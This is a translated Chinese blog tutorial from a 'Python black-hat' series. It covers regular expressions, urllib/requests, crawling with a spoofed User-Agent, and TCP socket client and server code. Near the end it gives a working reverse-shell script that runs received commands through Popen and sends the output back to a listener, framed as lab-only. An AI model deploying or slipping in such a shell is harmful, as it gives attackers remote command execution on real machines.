This second article in the Python black-hat series covers the Python basics of network attack and defense: a look at what Python can do, plus introductions to regular expressions, web crawlers, and socket communication. The article draws on teacher ADO's course at ichunqiu (I really recommend studying the ichunqiu courses) and adds explanations from the author's own experience. I hope this basic article helps you and improves your security awareness, and you are welcome to discuss it.
Na Zhang AI Security Home opened on August 18, 2020. It focuses on Python and security technology, mainly sharing articles on web penetration, system security, CVE reproduction, threat intelligence analysis, artificial intelligence, big data analysis, malicious code detection, and more. I really want to share what I have learned and done over the past ten years and make progress together with everyone.
Statement: I firmly oppose using these teachings to carry out malicious attacks; all wrongdoing will be severely punished. A green network needs our joint maintenance. I also recommend that you understand the principles behind the techniques so you can build better security protection. Although the author is a security novice, I will make sure every article is carefully written. I hope these basic articles help you, and that we walk the security road together.
First, you need to understand the seven basic steps of network attack and defense.
The picture below shows the ATT&CK framework, which includes 12 tactics.
Second, why choose Python as the development tool?
Really good security engineers build the tools they need (including modifying open-source code), and Python is exactly such a sharp tool. Python-based development platforms include Seebug, TangScan, BugScan, and others. In terms of breadth, Python can handle honeypot deployment, sandboxes, Wi-Fi man-in-the-middle attacks, Scrapy web crawlers, exploit writing, common tools, and more; in terms of depth, Python can implement tools as powerful as the SQL injection tool SQLMAP or the man-in-the-middle attack artifact mitmproxy. Because Python is simple, easy to learn, free and open source, high-level, portable, extensible, and rich in third-party libraries, a few lines of Python can do what takes a lot of Java code. Python is also cross-platform, usable on both Linux and Windows, and lets us quickly implement and verify our attack and defense ideas, which is why we chose it as the development tool.
So, what can we use Python to do?
Finally, readers are advised to prepare the following.
Here is a simple Python example. It imports the extension package base64, the module that base64-encodes and -decodes strings; print(dir(base64)) and help(base64) let you inspect its functions.
# -*- coding: utf-8 -*-
import base64
print(dir(base64))
print(base64.__file__)
print(base64.b64encode(b'eastmount'))
The output is shown in the figure below, including the module's source file location and the encoding of "eastmount".
Next we start learning Python regular expressions, Python web programming, and Python network programming.
Before using regular expressions, we need a basic grasp of Python and the HTTP protocol, and familiarity with tools such as BurpSuite and SQLMAP. Python regular expressions are widely used in crawler development, multithreading, and network programming, and hacking applications also involve regular expression knowledge, such as scanning, brute-forcing, and POCs.
A regular expression (RegEx) uses a single string to describe and match a series of strings that satisfy a syntactic rule. For example, if you want to extract the IP addresses inside a piece of text, you need a regular expression to do it. Python supports regular expressions through the re module, and the basic steps are: compile a pattern with re.compile, match it against the text, and extract the results from the match object.
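For instance, here is a minimal sketch of that IP-address use case (the sample log line is made up, and the pattern only loosely matches dotted quads without validating octet ranges):

# -*- coding: utf-8 -*-
# Sketch: extract IPv4-looking strings from text with a regular expression.
import re

log = "Failed login from 192.168.1.10, retry from 10.0.0.254"
ips = re.findall(r'\d{1,3}(?:\.\d{1,3}){3}', log)
print(ips)
# ['192.168.1.10', '10.0.0.254']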
Here is a simple example:
import re
pattern = re.compile('east')
match = pattern.match('eastmount!')
print(match.group())
word = re.findall('east', 'east mount')
print(word)
The output is:
east
['east']
The dot (.) matches any single character except the newline character "\n".
import re
word = "http://www.eastmount.com Python_9.29"
key = re.findall('t.', word)
print(key)
The output is ['tt', 'tm', 't.', 'th']: each match is the character t followed by any one character.
The backslash (\) introduces an escape character. If you need to match a literal dot, you must escape it with the backslash, writing \. instead.
import re
word = "http://www.eastmount.com Python_9.29"
key = re.findall(r'\.', word)
print(key)
The output is ['.', '.', '.'].
Brackets [...] match any one character from the character set at that position.
The characters in the set can be listed one by one or given as a range, such as [abc] or [a-c]. If the first character is ^, the set is inverted: [^abc] means any character other than a, b, or c. For example, a[bcd]e matches abe, ace, and ade.
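A minimal sketch of that bracket rule:

# -*- coding: utf-8 -*-
# Character-class sketch: a[bcd]e matches abe, ace, ade but not afe.
import re

key = re.findall('a[bcd]e', 'abe ace ade afe')
print(key)
# ['abe', 'ace', 'ade']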
Matching digits and non-digits:
# -*- coding: utf-8 -*-
import re
# Match the numbers
word = "http://www.eastmount.com Python_9.29"
key = re.findall(r'\d\.\d\d', word)
print(key)

# Match non-digits
key = re.findall(r'\D', word)
print(key)
The output is ['9.29'] for the digits, followed by the list of non-digit characters, as shown in the figure below:
Regular expressions can be hard to read. I recommend searching for the relevant rules when you actually need them; you will pick them up through use. For further regular expression usage, readers are advised to study on their own, starting from the common elements summarized below.
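For reference, the most common elements of standard re syntax are:
\d matches a digit, \D a non-digit;
\w matches a word character [a-zA-Z0-9_], \W a non-word character;
\s matches a whitespace character, \S non-whitespace;
* means zero or more repetitions, + one or more, ? zero or one;
{m,n} means between m and n repetitions;
^ matches the start of a string, $ the end;
(...) captures a group, and .*? matches any characters non-greedily.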
The following patterns are quite common and may be helpful in network attack and defense.
1. Extracting numbers
# -*- coding: utf-8 -*-
import re
string="A1.45,b5,6.45,8.82"
regex = re.compile(r"\d+\.?\d*")
print(regex.findall(string))
The output is:
['1.45', '5', '6.45', '8.82']
2. Extracting the content between tags
# coding=utf-8
import re

html = u'<title>Welcome to the Python attack and defense series</title>'
title = re.findall(r'<title>(.*?)</title>', html)
for i in title:
    print(i)
The output is the title text: Welcome to the Python attack and defense series.
3. Extracting the content between hyperlink tags
# coding=utf-8
import re
import urllib.request

url = "http://www.baidu.com/"
content = urllib.request.urlopen(url).read()
#print(content)

# Get the full hyperlinks
res = r"<a.*?href=.*?<\/a>"
urls = re.findall(res, content.decode('utf-8'))
for u in urls:
    print(u)

# Get the content between <a> and </a>
res = r'<a .*?>(.*?)</a>'
texts = re.findall(res, content.decode('utf-8'), re.S|re.M)
for t in texts:
    print(t)
The output is shown below. Chinese character encoding is a common problem to watch out for, for example UTF-8 encoding.
4. Extracting the URL from hyperlink tags
# coding=utf-8
import re
content = '''
<a href="http://news.baidu.com" name="tj_trnews" class="mnav">News</a>
<a href="http://www.hao123.com" name="tj_trhao123" class="mnav">hao123</a>
<a href="http://map.baidu.com" name="tj_trmap" class="mnav">Map</a>
<a href="http://v.baidu.com" name="tj_trvideo" class="mnav">Video</a>
'''
res = r"(?<=href=\").+?(?=\")|(?<=href=\').+?(?=\')"
urls = re.findall(res, content, re.I|re.S|re.M)
for url in urls:
    print(url)
The extracted hyperlinks are output as shown in the figure below:
5. Extracting the image URL and image name from image tags
In HTML we can see all kinds of images. The basic format of an image tag is <img src="image address" />, and only by extracting the original addresses of these images can we download the corresponding images locally. So how do we get the original image address inside the tag? The following code shows one way to extract the image link address.
content = '''<img alt="Python" src="http://www.yangxiuzhang.com/eastmount.jpg" />'''
urls = re.findall('src="(.*?)"', content, re.I|re.S|re.M)
print(urls)
# ['http://www.yangxiuzhang.com/eastmount.jpg']
The original image address here is "http://www.xxx.com/eastmount.jpg". It corresponds to one image stored on the "www.xxx.com" server, and the field after the last "/" is the image name, namely "eastmount.jpg". So how do we get the last field of a URL?
content = '''<img alt="Python" src="http://www..csdn.net/eastmount.jpg" />'''
urls = 'http://www..csdn.net/eastmount.jpg'
name = urls.split('/')[-1]
print(name)
# eastmount.jpg
For more uses of regular expressions, readers should practice by combining them with real scenarios.
Web programming here does not mean developing web applications with Python; it means using Python to interact with the web and obtain web information. The main contents include:
urllib is the Python library for working with URLs (Uniform Resource Locators). It can fetch remote data and save it, and even set headers, proxies, timeouts, and authentication. The high-level interface provided by the urllib module lets us read data from www or ftp just like a local file, and it is more convenient to use than languages such as C++ or C#. The common methods are as follows:
urlopen(url, data=None, proxies=None)
This method creates a file-like object for a remote URL, which you then operate on like a local file to fetch remote data. The parameter url is the path to the remote data, usually a web address; data is the data submitted to the url with a post method; proxies sets a proxy. urlopen returns a file-like object. (The signature above is the Python 2 one; in Python 3 the function lives at urllib.request.urlopen and takes a timeout instead of proxies.)
# -*- coding:utf-8 -*-
import urllib.request
url = "http://www.baidu.com"
content = urllib.request.urlopen(url)
print(content.info())     # Header information
print(content.geturl())   # Requested url
print(content.getcode())  # HTTP status code
This snippet calls urllib.request.urlopen(url) to open the Baidu link and outputs its message headers, URL, HTTP status code, and other information, as shown in the figure below.
urlretrieve(url, filename=None, reporthook=None, data=None)
urlretrieve downloads remote data to the local machine. The parameter filename specifies the local save path; if omitted, urllib automatically generates a temporary file to save the data. The parameter reporthook is a callback function triggered when the server connection is established and each data block is transferred; it is usually used to display download progress. The parameter data is data passed to the server.
# -*- coding:utf-8 -*-
import urllib.request
url = 'https://www.baidu.com/img/bd_logo.png'
path = 'test.png'
urllib.request.urlretrieve(url, path)
This downloads the Baidu logo image to the local file test.png.
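As a sketch of the reporthook callback described above (assuming the server reports a total size, so the percentage math is meaningful):

# -*- coding:utf-8 -*-
# Minimal sketch: show download progress via the reporthook callback.
import urllib.request

def schedule(block_num, block_size, total_size):
    # Called once per block: report the percentage downloaded so far.
    percent = min(100.0 * block_num * block_size / total_size, 100)
    print('%.2f%%' % percent)

url = 'https://www.baidu.com/img/bd_logo.png'
urllib.request.urlretrieve(url, 'test.png', schedule)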
Note: Python 3 and Python 2 code differ slightly here; Python 2 calls urllib.urlopen() directly.
The requests module is a third-party HTTP library written in Python on top of urllib, released under the Apache2 open source license. It is more convenient than urllib, saves a lot of work, and fully meets HTTP testing needs. requests is a very practical Python HTTP client library, frequently used when writing crawlers and testing server responses. I recommend starting from the official requests website; here is only a brief introduction.
Assuming the reader has already installed the module with "pip install requests", its basic usage is explained below.
1. Sending network requests
r = requests.get("http://www.eastmountyxz.com")
r = requests.post("http://www.eastmountyxz.com")
r = requests.put("http://www.eastmountyxz.com")
r = requests.delete("http://www.eastmountyxz.com")
r = requests.head("http://www.eastmountyxz.com")
r = requests.options("http://www.eastmountyxz.com")
2. Passing parameters in a URL
import requests
payload = {'key1': 'value1', 'key2': 'value2'}
r = requests.get('http://httpbin.org/get', params=payload)
print(r.url)
The output shows the parameters spliced onto the URL, i.e. http://httpbin.org/get?key1=value1&key2=value2, as shown in the figure below.
3. Response content
import requests
r = requests.get('http://www.eastmountyxz.com')
print(r.text)
print(r.encoding)
4. Binary response content
r = requests.get('http://www.eastmountyxz.com')
print(r.content)
5. Custom request headers
url = 'http://www.ichunqiu.com'
headers = {'content-type': 'application/json'}
r = requests.get(url, headers=headers)
Note: cookies can also be added to the headers.
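For example, a minimal sketch (the session value is a placeholder; requests also accepts a dedicated cookies parameter):

headers = {'content-type': 'application/json', 'Cookie': 'session=abc123'}
r = requests.get(url, headers=headers)
# or equivalently:
r = requests.get(url, cookies={'session': 'abc123'})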
6. Complex POST requests
payload = {'key1': 'value1', 'key2': 'value2'}
r = requests.post('http://httpbin.org/post', data=payload)
7. Response status codes and headers
r = requests.get('http://www.ichunqiu.com')
r.status_code
r.headers
8. Cookies
r.cookies
r.cookies['example_cookie_name']
9. Timeouts
requests.get('http://www.ichunqiu.com', timeout=0.001)
10. Errors and exceptions
When there are network problems (such as a DNS lookup failure or a refused connection), requests raises a ConnectionError; a rare invalid HTTP response raises an HTTPError; and if the request times out, a Timeout exception is raised.
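A minimal sketch of catching those exceptions (the URL is only an example):

# -*- coding: utf-8 -*-
# Sketch: handle the requests exceptions described above.
import requests

try:
    r = requests.get('http://www.ichunqiu.com', timeout=3)
    r.raise_for_status()   # turn 4xx/5xx responses into HTTPError
except requests.exceptions.Timeout:
    print('The request timed out')
except requests.exceptions.ConnectionError:
    print('Network problem (DNS failure, refused connection, ...)')
except requests.exceptions.HTTPError as e:
    print('Invalid HTTP response:', e)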
A web crawler, also called a web spider, web robot, or web chaser, is a program or script that automatically fetches information from the World Wide Web according to certain rules. Its biggest benefit is obtaining and processing information in batch, automatically, giving us one angle on the macro or micro situation. In the security field, crawlers can do directory scanning and search for test pages, sample documents, administrator login pages, and so on. Many companies (such as NSFOCUS) also implement web vulnerability scanning through Python automation.
The following two cases are simple but solve many people's problems; I hope readers can complete them independently.
1. Setting request headers (related to traffic analysis)
Suppose we need to crawl the Steve Jobs entry of the 360 Encyclopedia, as shown in the figure below.
Traditional crawler code will be intercepted by the website, so we cannot get the relevant information:
# -*- coding: utf-8 -*-
import requests
url = "https://baike.so.com/doc/24386561-25208408.html"
content = requests.get(url)
print(content.text)
Right-click to inspect the element (or press F12) and find the Headers values under the Network tab. headers contains many fields; the most frequently used are user-agent and host, which appear as key-value pairs. If we supply the user-agent as a key-value pair in our headers dictionary, we can get past the anti-crawling check.
The code is as follows:
# -*- coding: utf-8 -*-
import requests
# Add request header
url = "https://baike.so.com/doc/24386561-25208408.html"
headers = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36'
}
content = requests.get(url, headers=headers)
content.encoding='utf-8'
print(content.text)
The output is shown in the figure below:
Some websites return data in JSON format, which we can process with the json module. The core code is as follows (r is the response returned by requests; the 'result' and 'courseName' keys follow the target site's format):
import json

data = json.loads(r.text)
print(data['result'])
name_len = len(data['result'])
for i in range(name_len):
    print(data['result'][i]['courseName'])
2. Submitting data in a request (related to blind injection)
If a website involves paging and we need the information from every page, the most traditional way is to define a function and loop over the pages, visiting the content of a different page each time. The core code is as follows:
url_start = ""
url_end = ""
def lesson(url):
....
for i in range(1,9)
url = url_start+ str(i) + url_end
lesson(url)
But if the URL stays the same while paging, we need deeper analysis, or we can simulate the browser with Selenium for crawling. Here is a more skillful method.
Suppose we want to crawl a website's public information, but while paging we find that the page URL never changes. We can roughly judge that the data in the table is loaded dynamically through JS, so we can capture packets to find the real request address. The target website is as follows:
By inspecting elements you can find a pagesnum variable that marks our page number, so we only need to submit this variable through requests to page through the data.
The core code is as follows:
# -*- coding: utf-8 -*-
import requests
import time
import datetime
url = "http://www.hshfy.sh.cn/shfy/gweb/ktgg_search_content.jsp?"
page_num = 1
date_time = datetime.date.fromtimestamp(time.time())
print(date_time)
data = {
    "pktrqks": date_time,
    "ktrqjs": date_time,
    "pagesnum": page_num
}
print(data)
content = requests.get(url, data, timeout=3)
content.encoding='gbk'
print(content.text)
Python network communication mainly uses the C/S architecture, implemented with sockets. C/S means the client (Client) and server (Server) architecture: the server's only purpose is to wait for client requests; the client connects to the server, sends the necessary data, and then waits for the server to finish handling the request and give feedback.
C/S network programming: on the server side, first create a communication endpoint and let the server listen for requests, then enter an infinite loop of waiting for and handling client requests. Client programming is simpler than server programming: just create a communication endpoint, establish a connection to the server, and make a request.
A socket is a computer networking data structure with the concept of a "communication endpoint"; a networked application must create a socket before any communication. It is like a telephone jack: without it there is no communication, which is a vivid metaphor. Python supports AF_UNIX, AF_NETLINK, and AF_INET, where AF_INET is the network-based socket family.
Sockets originated in the 1970s with the Berkeley version of Unix at the University of California, i.e. BSD Unix, so they are also known as "Berkeley sockets" or "BSD sockets". Initially, sockets were designed for communication between multiple applications on the same host, which is called inter-process communication, or IPC.
There are two kinds of sockets: file-based and network-based.
If you compare a socket to a telephone jack, the bottom-level structure of communication, then the host and port are like an area code and phone number. An Internet address consists of the host and port necessary for network communication. And there must be someone on the other end of the line, otherwise you get "Sorry, the number you dialed does not exist, please check and dial again." Similarly, you may encounter errors such as "Unable to connect to the server" or "The server is not responding". The legal port range is 0-65535, and port numbers below 1024 are reserved for the system.
1. Connection-oriented: TCP
A connection must be established before communication; this style is also called a "virtual circuit" or "stream socket". Connection-oriented communication provides in-order, reliable, non-duplicated data delivery without adding data boundaries. This means each message may be split into multiple pieces, every piece arrives at the destination correctly, the pieces are reassembled in order, and the whole message is handed to the waiting application.
The main protocol implementing this connection is the Transmission Control Protocol, TCP. To create a TCP socket, you must specify the socket type as SOCK_STREAM, which expresses its character as a stream socket. Because these sockets use the Internet Protocol, IP, to find hosts in the network, the system they form is usually described by the combination of the two protocols, i.e. TCP/IP.
2. Connectionless: UDP
Communication is possible without establishing a connection, but the arrival order, reliability, and non-duplication of data cannot be guaranteed. Datagrams do preserve data boundaries, meaning each message is sent whole rather than split into pieces like connection-oriented protocols. It is like the postal service: letters and parcels do not necessarily arrive in the order they were sent, and some may not arrive at all; messages on the network may even be sent repeatedly. With so many shortcomings, why use it? Because connection-oriented sockets must maintain a virtual circuit connection to provide their guarantees, which is serious extra overhead. Datagrams have no such burden, are "cheaper", usually offer better performance, and suit certain situations, such as live streaming, where real-time data must be fast.
The main protocol implementing this style is the User Datagram Protocol, UDP. To create a UDP socket, you must specify the socket type as SOCK_DGRAM. The name comes from datagram. These sockets use the Internet Protocol to find network hosts, and the whole system is called UDP/IP.
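A minimal sketch of datagram communication, with both endpoints in one process for a local test (port 21568 is an assumed value):

# -*- coding: utf-8 -*-
# Minimal UDP sketch: the "server" just binds, the "client" just sends.
from socket import socket, AF_INET, SOCK_DGRAM

ADDR = ('localhost', 21568)               # assumed test address

udpSerSock = socket(AF_INET, SOCK_DGRAM)  # receiver: bind, no listen() needed
udpSerSock.bind(ADDR)

udpCliSock = socket(AF_INET, SOCK_DGRAM)  # sender: no connect() needed
udpCliSock.sendto(b'hello udp', ADDR)     # fire off one datagram

data, addr = udpSerSock.recvfrom(1024)    # boundary preserved: one whole datagram
print('From', addr, ':', data)

udpSerSock.close()
udpCliSock.close()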
A socket is created with the socket() function of the socket module. The syntax is socket(socket_family, socket_type, protocol=0), where socket_family is AF_UNIX or AF_INET, socket_type can be SOCK_STREAM or SOCK_DGRAM, and protocol is usually omitted, defaulting to 0.
Creating a TCP/IP socket and a UDP/IP socket then looks like the sketch below.
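A minimal sketch:

# Minimal sketch of the two creation calls described above.
import socket

tcpSock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  # TCP/IP socket
udpSock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)   # UDP/IP socket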
Because the socket module has so many attributes, we can use the statement "from socket import *" to bring all of the module's attributes into our namespace, which greatly shortens the code: the calls above become simply socket(AF_INET, SOCK_STREAM) and socket(AF_INET, SOCK_DGRAM).
Here are the most commonly used socket object methods :
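s.bind(address): bind the (host, port) address to the socket
s.listen(backlog): start listening for TCP connections
s.accept(): passively accept a TCP client connection, blocking until one arrives
s.connect(address): actively initiate a TCP connection to a server
s.recv(bufsize): receive TCP data
s.send(data) / s.sendall(data): send TCP data
s.recvfrom(bufsize) / s.sendto(data, address): receive and send UDP data
s.close(): close the socket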
Tip: when running network applications, it is best if you can run the server and the client on different computers, which helps you understand the communication process better; otherwise, use localhost or 127.0.0.1.
1. The server: tcpSerSock.py
The core operations are as follows:
# -*- coding: utf-8 -*-
from socket import *
from time import ctime

HOST = 'localhost'   # Host name
PORT = 21567         # Port number
BUFSIZE = 1024       # Buffer size, 1K
ADDR = (HOST, PORT)

tcpSerSock = socket(AF_INET, SOCK_STREAM)
tcpSerSock.bind(ADDR)   # Bind the address to the socket
tcpSerSock.listen(5)    # Listen; allow up to 5 queued connections

while True:             # Loop forever, waiting for connections
    try:
        print('Waiting for connection ....')
        tcpCliSock, addr = tcpSerSock.accept()   # Passively accept a client connection
        print('Connected client from : ', addr)
        while True:
            data = tcpCliSock.recv(BUFSIZE)      # Receive data
            if not data:
                break
            else:
                print('Client: ', data)
            info = ('[%s] %s' % (ctime(), data))
            info = bytes(info, encoding="utf8")
            tcpCliSock.send(info)                # Send the data back with a timestamp
    except Exception as e:
        print('Error: ', e)
        tcpSerSock.close()   # Shut down the server
        tcpCliSock.close()
2. The client: tcpCliSock.py
The core operations are as follows:
# -*- coding: utf-8 -*-
from socket import *

HOST = 'localhost'   # Host name
PORT = 21567         # Port number; must match the server
BUFSIZE = 1024       # Buffer size, 1K
ADDR = (HOST, PORT)

tcpCliSock = socket(AF_INET, SOCK_STREAM)
tcpCliSock.connect(ADDR)   # Connect to the server

while True:                # Loop, sending and receiving data
    try:
        data = input('>')
        data = bytes(data, encoding="utf8")
        print(data, type(data))
        if not data:
            break
        tcpCliSock.send(data)             # Send data
        data = tcpCliSock.recv(BUFSIZE)   # Receive the reply
        if not data:
            break
        print('Server: ', data)
    except Exception as e:
        print('Error', e)
        tcpCliSock.close()   # Close the client
Because the server passively loops waiting for connections, you must run the server first and then open the client. Also, because my Python IDLE would always stop responding, I run the server program from cmd and the client from Python IDLE to communicate. The result is shown in the figure below:
Another way is to open Python 3.6 and Python 3.7 at the same time and let them communicate, as shown in the figure below.
It is recommended to create threads to handle client requests. SocketServer is a high-level socket communication module built on the socket module that supports handling client requests in new threads or processes. It is also recommended to wrap the server's exit and close() call in a try-except statement.
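As a sketch of that suggestion (assuming Python 3, where the module is the lowercase socketserver; the port matches the earlier example):

# -*- coding: utf-8 -*-
# Minimal sketch: a threaded echo server built on socketserver.
import socketserver
from time import ctime

class EchoHandler(socketserver.BaseRequestHandler):
    def handle(self):
        # self.request is the client socket; each client runs in its own thread.
        data = self.request.recv(1024)
        if data:
            info = '[%s] %s' % (ctime(), data.decode('utf8'))
            self.request.send(info.encode('utf8'))

if __name__ == '__main__':
    server = socketserver.ThreadingTCPServer(('localhost', 21567), EchoHandler)
    try:
        server.serve_forever()
    except KeyboardInterrupt:
        server.server_close()   # close inside try-except, as suggested above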
So, how do we write a program that bounces back a shell?
Import the library with from subprocess import Popen, PIPE and call system commands to implement it. The core idea is sketched below; after the later in-depth articles on reproducing Windows vulnerabilities, you will understand this part of the code better.
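A minimal sketch of the idea, assuming an authorized lab environment where HOST and PORT point at your own test listener (e.g. nc -lvp 9999):

# -*- coding: utf-8 -*-
# Minimal sketch for an authorized lab only: connect back to a test
# listener and pipe received commands through Popen.
from subprocess import Popen, PIPE
from socket import socket, AF_INET, SOCK_STREAM

HOST, PORT = '127.0.0.1', 9999           # assumed lab listener address

s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))
while True:
    cmd = s.recv(1024).decode().strip()  # read one command from the listener
    if not cmd or cmd in ('exit', 'quit'):
        break
    p = Popen(cmd, shell=True, stdout=PIPE, stderr=PIPE)
    out, err = p.communicate()           # run the command, capture its output
    s.send(out + err)                    # send the result back
s.close()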
I hope this article helps you. This is the second blog in the Python black-hat series; the author will keep studying in depth and build some common gadgets for everyone to exchange. Finally, thank you for following the "Na Zhang's home" official account. I hope my articles can accompany you as you grow, and that we keep moving forward on the road of technology. If this article helps you or gives you insight, that is the best reward for me. Thanks again for your attention, and please help promote "Na Zhang's home", haha~ I'm new here, please give me your advice.
Finally:
A three-foot podium, a three-inch pen, three thousand students.
Ten years of trees, ten years of wind and rain, a hundred thousand pillars.
I wish all teachers a happy holiday; it is also my fifth Teachers' Day. From our goddess going to a mountain village to support teaching in 2011, to my stepping onto the supporting-education platform in 2014, to truly becoming a university teacher in 2016, thank you all for the company along the way. Happy holiday to the goddess and me, and thank you for your blessings and help.
Whether or not I continue to be a teacher in the future, Xiuzhang will always remember the beauty of being a teacher, remember the charm of sharing knowledge, and remember your bright smiling faces. I will keep sharing better articles online; I truly hope to help more people and share what I have learned over these years. Stay true to the original aspiration, and move forward with gratitude. Funny enough, the normal-school graduate didn't end up teaching, but the programmer did, haha!
(By: Na Zhang AI Security Home, Eastmount, 2020-09-11, night in Wuhan)